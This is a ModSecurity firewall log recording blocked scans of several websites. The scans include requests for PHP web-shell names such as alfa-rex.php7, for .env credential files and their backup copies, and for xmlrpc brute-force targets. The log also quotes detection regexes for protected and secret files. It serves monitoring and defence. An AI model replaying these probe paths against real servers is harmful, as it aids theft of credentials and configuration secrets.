[Tue May 26 14:01:35.412957 2026] [security2:error] [pid 578581:tid 578791] [client 4.193.189.92:1421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/as.php"] [unique_id "ahVaZ5m_8al1sb-umPtlJwAAAFA"]
[Tue May 26 14:01:36.160110 2026] [security2:error] [pid 578581:tid 578770] [client 4.193.189.92:6494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/aa.php"] [unique_id "ahVaaJm_8al1sb-umPtlQQAAADs"]
[Tue May 26 14:01:36.887925 2026] [security2:error] [pid 578581:tid 578752] [client 4.193.189.92:6514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/abc.php"] [unique_id "ahVaaJm_8al1sb-umPtlYAAAACk"]
[Tue May 26 14:01:36.951394 2026] [security2:error] [pid 578581:tid 578812] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaaJm_8al1sb-umPtlTQAAAGU"]
[Tue May 26 14:01:37.368538 2026] [security2:error] [pid 578581:tid 578799] [client 129.222.147.134:14911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaaZm_8al1sb-umPtlbgAAAFg"]
[Tue May 26 14:01:37.368657 2026] [security2:error] [pid 578581:tid 578799] [client 129.222.147.134:14911] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaaZm_8al1sb-umPtlbgAAAFg"]
[Tue May 26 14:01:37.597302 2026] [security2:error] [pid 578581:tid 578792] [client 4.193.189.92:3130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/av.php"] [unique_id "ahVaaZm_8al1sb-umPtlcgAAAFE"]
[Tue May 26 14:01:38.394049 2026] [security2:error] [pid 578581:tid 578754] [client 4.193.189.92:1441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/autoload_classmap.php"] [unique_id "ahVaapm_8al1sb-umPtlggAAACs"]
[Tue May 26 14:01:38.836930 2026] [security2:error] [pid 578581:tid 578815] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaapm_8al1sb-umPtlhwAAAGg"]
[Tue May 26 14:01:39.121130 2026] [security2:error] [pid 578581:tid 578813] [client 4.193.189.92:6283] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/asus.php"] [unique_id "ahVaa5m_8al1sb-umPtlmgAAAGY"]
[Tue May 26 14:01:39.835809 2026] [security2:error] [pid 578581:tid 578792] [client 4.193.189.92:2176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/about.php"] [unique_id "ahVaa5m_8al1sb-umPtlrQAAAFE"]
[Tue May 26 14:01:40.036282 2026] [security2:error] [pid 578581:tid 578679] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env"] [unique_id "ahVabJm_8al1sb-umPtltAAAEGE"]
[Tue May 26 14:01:40.044701 2026] [security2:error] [pid 578581:tid 578582] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.blog.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVabJm_8al1sb-umPtluQAAEAA"]
[Tue May 26 14:01:40.181462 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtltgAAEGI"]
[Tue May 26 14:01:40.183927 2026] [security2:error] [pid 578581:tid 578693] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVabJm_8al1sb-umPtlzAAAEG8"]
[Tue May 26 14:01:40.187012 2026] [security2:error] [pid 578581:tid 578584] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVabJm_8al1sb-umPtlzwAAEAI"]
[Tue May 26 14:01:40.219578 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlswAAEF8"]
[Tue May 26 14:01:40.221823 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtluAAAEGU"]
[Tue May 26 14:01:40.222915 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtluwAAEAA"]
[Tue May 26 14:01:40.224922 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtltwAAEGM"]
[Tue May 26 14:01:40.315851 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlyQAAEAE"]
[Tue May 26 14:01:40.323603 2026] [security2:error] [pid 578581:tid 578680] [remote 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlxwAAEGI"]
[Tue May 26 14:01:40.324582 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlyAAAEGk"]
[Tue May 26 14:01:40.325819 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlzgAAEG8"]
[Tue May 26 14:01:40.327479 2026] [security2:error] [pid 578581:tid 578585] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVabJm_8al1sb-umPtl0QAAEAM"]
[Tue May 26 14:01:40.330760 2026] [security2:error] [pid 578581:tid 578594] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env"] [unique_id "ahVabJm_8al1sb-umPtl0wAAEAw"]
[Tue May 26 14:01:40.336117 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl0AAAEAU"]
[Tue May 26 14:01:40.337934 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlygAAEGo"]
[Tue May 26 14:01:40.368051 2026] [security2:error] [pid 578581:tid 578595] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVabJm_8al1sb-umPtl2AAAEA0"]
[Tue May 26 14:01:40.369297 2026] [security2:error] [pid 578581:tid 578597] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVabJm_8al1sb-umPtl2QAAEA8"]
[Tue May 26 14:01:40.455438 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl0gAAEAQ"]
[Tue May 26 14:01:40.460118 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl1gAAEA4"]
[Tue May 26 14:01:40.463277 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl1AAAEAo"]
[Tue May 26 14:01:40.464570 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl1QAAEHA"]
[Tue May 26 14:01:40.489816 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl1wAAEAs"]
[Tue May 26 14:01:40.499732 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl2gAAEAg"]
[Tue May 26 14:01:40.518364 2026] [security2:error] [pid 578581:tid 578696] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVabJm_8al1sb-umPtl6gAAEHI"]
[Tue May 26 14:01:40.542776 2026] [security2:error] [pid 578581:tid 578821] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtlvQAAAG4"]
[Tue May 26 14:01:40.592330 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl3gAAEBA"]
[Tue May 26 14:01:40.595063 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl4QAAEBQ"]
[Tue May 26 14:01:40.597855 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl3wAAEBE"]
[Tue May 26 14:01:40.603904 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl4AAAEBI"]
[Tue May 26 14:01:40.625720 2026] [security2:error] [pid 578581:tid 578752] [client 4.193.189.92:1356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/atomlib.php"] [unique_id "ahVabJm_8al1sb-umPtl9QAAACk"]
[Tue May 26 14:01:40.658304 2026] [security2:error] [pid 578581:tid 578605] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/.env.php"] [unique_id "ahVabJm_8al1sb-umPtl8QAAEBc"]
[Tue May 26 14:01:40.738722 2026] [security2:error] [pid 578581:tid 578703] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVabJm_8al1sb-umPtl_AAAEHk"]
[Tue May 26 14:01:40.751124 2026] [security2:error] [pid 578581:tid 578610] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/.env~"] [unique_id "ahVabJm_8al1sb-umPtl_wAAEBw"]
[Tue May 26 14:01:41.278886 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl6QAAEBg"]
[Tue May 26 14:01:41.292713 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl4wAAEBU"]
[Tue May 26 14:01:41.304654 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl5wAAEHE"]
[Tue May 26 14:01:41.316383 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl5QAAEBY"]
[Tue May 26 14:01:41.336953 2026] [security2:error] [pid 578581:tid 578781] [client 4.193.189.92:3129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/alfa-rex.php7"] [unique_id "ahVabZm_8al1sb-umPtmFAAAAEY"]
[Tue May 26 14:01:41.339079 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl4gAAEBM"]
[Tue May 26 14:01:41.380713 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl8gAAEHY"]
[Tue May 26 14:01:41.389474 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl8wAAEBs"]
[Tue May 26 14:01:41.391500 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl9AAAEHU"]
[Tue May 26 14:01:41.394601 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl-AAAEHQ"]
[Tue May 26 14:01:41.406514 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl-wAAEBk"]
[Tue May 26 14:01:41.407157 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl9gAAEHM"]
[Tue May 26 14:01:41.414374 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtmAwAAEHo"]
[Tue May 26 14:01:41.415204 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtmBAAAEHs"]
[Tue May 26 14:01:41.422879 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl_gAAEHc"]
[Tue May 26 14:01:41.427279 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtl_QAAEHg"]
[Tue May 26 14:01:41.438214 2026] [security2:error] [pid 578581:tid 578727] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVabJm_8al1sb-umPtmBQAAEHw"]
